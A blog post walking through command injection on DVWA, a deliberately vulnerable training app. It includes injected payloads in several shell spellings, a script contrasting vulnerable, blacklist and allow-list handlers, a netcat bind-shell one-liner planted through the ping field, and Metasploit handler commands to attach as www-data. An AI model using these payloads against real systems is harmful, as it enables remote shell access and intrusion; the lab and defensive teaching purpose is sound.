
Exploiting Command Injection vulnerabilities

18 Apr 2017 . category: tech
#redteam #kali #dvwa #metasploit

Command Injection is the abuse of a vulnerable application to execute arbitrary commands on the host operating system. It becomes possible whenever an application takes user input, skips validation, and concatenates that input into a command string that it hands to the system shell: every shell metacharacter in the input (a semicolon, &&, a pipe, backticks, $( ), even a newline) is then parsed as part of the command line. In this post we'll get our hands on DVWA's Command Injection section, plant a backdoor on the server, and attach to it with Metasploit.

Visit the Command Injection section of DVWA.

ci-0

The page says that it will ping an IP address for us, so let's see what it does with 127.0.0.1:

ci-1

Now, let's append a second command, ls, after the IP address, separated from it by a semicolon:


127.0.0.1; ls

ci-2

Sweet, DVWA simply appends our input to the underlying shell command: the semicolon terminates the ping command and ls runs as a second command, with its output returned in the page.
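What happens on the server side, and why a single semicolon is enough, is easier to see in code. The script below is an added example, not DVWA's own PHP and not part of the original post: it rebuilds the vulnerable pattern (DVWA's PHP hands "ping -c 4 " concatenated with the user value to /bin/sh -c) in POSIX shell, next to an assumed blacklist "fix" that strips ; and && (hypothetical, not DVWA's code) and an allow-listing version that validates the value as a dotted-quad IPv4 address and passes it as an argument. echo stands in for ping so the script runs offline, and the injected command is printf IN%s JECTED rather than ls so that a payload which is merely echoed back is not mistaken for one that was executed.

```shell
#!/bin/sh
# Added example: not DVWA's own code. DVWA's PHP does, in effect,
# shell_exec("ping -c 4 " . $ip); the concatenated string lands in
# /bin/sh -c, which is what these functions reproduce. "echo" stands in
# for ping so this runs offline without raw-socket privileges; the
# shell parsing, which is the whole vulnerability, is unchanged.

# VULNERABLE: the user value is spliced into the command string before
# the shell parses it, so any metacharacter in the value becomes syntax.
vulnerable_ping() {
  sh -c "echo ping -c 1 $1"
}

# STILL VULNERABLE: an assumed (hypothetical) "fix" that strips ';' and
# '&&'. A blacklist only covers the separators its author remembered.
blacklist_ping() {
  filtered=$(printf '%s' "$1" | sed 's/;//g; s/&&//g')
  sh -c "echo ping -c 1 $filtered"
}

# HARDENED: allow-list the shape (assumed policy: dotted-quad IPv4 only)
# and then pass the value as an argument, so the shell never re-parses it.
safe_ping() {
  ip=$1
  case "$ip" in
    ''|*[!0-9.]*|.*|*.|*..*) printf 'rejected: %s\n' "$ip" >&2; return 1 ;;
  esac
  n=0
  for octet in $(printf '%s' "$ip" | tr . ' '); do
    n=$((n + 1))
    [ "$octet" -le 255 ] 2>/dev/null || { printf 'rejected: %s\n' "$ip" >&2; return 1; }
  done
  [ "$n" -eq 4 ] || { printf 'rejected: %s\n' "$ip" >&2; return 1; }
  echo ping -c 1 "$ip"
}

# Oracle: the injected command is 'printf IN%s JECTED', which prints the
# marker INJECTED only when it is actually executed. If a handler merely
# echoes the payload text, the output contains 'printf IN%s JECTED', not
# the marker, so a blocked attempt is not mistaken for a successful one.
MARK='printf IN%s JECTED'

# Constructed payloads: the page's "; ls" trick in other shell spellings.
PAYLOAD_SEMI="127.0.0.1; $MARK"
PAYLOAD_AND="127.0.0.1 && $MARK"
PAYLOAD_PIPE="127.0.0.1 | $MARK"
PAYLOAD_SUBST="127.0.0.1 \$($MARK)"
PAYLOAD_NEWLINE="127.0.0.1
$MARK"

# Returns 0 when feeding payload $2 to handler $1 executed the injected command.
runs_injected() {
  "$1" "$2" 2>/dev/null | grep -q INJECTED
}

main() {
  for handler in vulnerable_ping blacklist_ping safe_ping; do
    for p in "$PAYLOAD_SEMI" "$PAYLOAD_AND" "$PAYLOAD_PIPE" "$PAYLOAD_SUBST" "$PAYLOAD_NEWLINE"; do
      if runs_injected "$handler" "$p"; then result=INJECTED; else result=blocked; fi
      printf '%-16s %-9s %s\n' "$handler" "$result" "$(printf '%s' "$p" | tr '\n' ' ')"
    done
  done
}

main "$@"
```

Run it with sh and you get a table: vulnerable_ping executes all five spellings, blacklist_ping still executes the pipe, $( ) and newline variants, and safe_ping rejects everything that is not a bare IPv4 address. The two lessons are that filtering characters is a losing game against the shell grammar, and that the real fix is to never let user data reach a shell parser: validate against an allow-list and pass the value as an argument (in PHP, escapeshellarg() on each argument, or avoid the shell entirely).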

Now, let's use the same trick to plant a bind shell: create a named pipe, have sh read its commands from the pipe, send the shell's output into a netcat listener on port 4444, and write everything netcat receives back into the pipe. Note that only stdout travels back through netcat; append 2>&1 to the sh command if you also want its error messages:


127.0.0.1; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l -p 4444 > /tmp/pipe

ci-3

As you will notice, the page keeps loading: the web server's PHP process is blocked until the command finishes, and the command won't finish because netcat is now sitting on port 4444 waiting for a client. In other words, our backdoor is open and waiting for us… :smile:

Let’s start msfconsole and open the shell on the server:


msfconsole
use exploit/multi/handler
set payload linux/x64/shell/bind_tcp
set RHOST 127.0.0.1
exploit

ci-4

Note that we didn't set LPORT for bind_tcp, since the default is 4444, which matches our netcat listener. One caveat: linux/x64/shell/bind_tcp is a staged payload, so multi/handler connects and pushes a stage into the socket before treating it as a shell. That step is unnecessary here, because netcat is already feeding /bin/sh; the stageless generic/shell_bind_tcp payload, or simply nc 127.0.0.1 4444 from a terminal, attaches to the same listener without it.

As you can see, we are the www-data user, which is why we can't read /etc/shadow, the file that holds the password hashes of the local accounts. But we have every privilege www-data has: we can, for example, modify DVWA's own files, or try to escalate to root by exploiting a local privilege escalation vulnerability.

Happy binding!


Me

Panos is a founder of two failed start-ups, has 2 approved patents and several scientific publications in first tier conferences and journals. Loves connecting business requirements with technology and building teams that deliver on time, with quality and within budget. Currently he is on a mission to modernize personal finance 🤖💰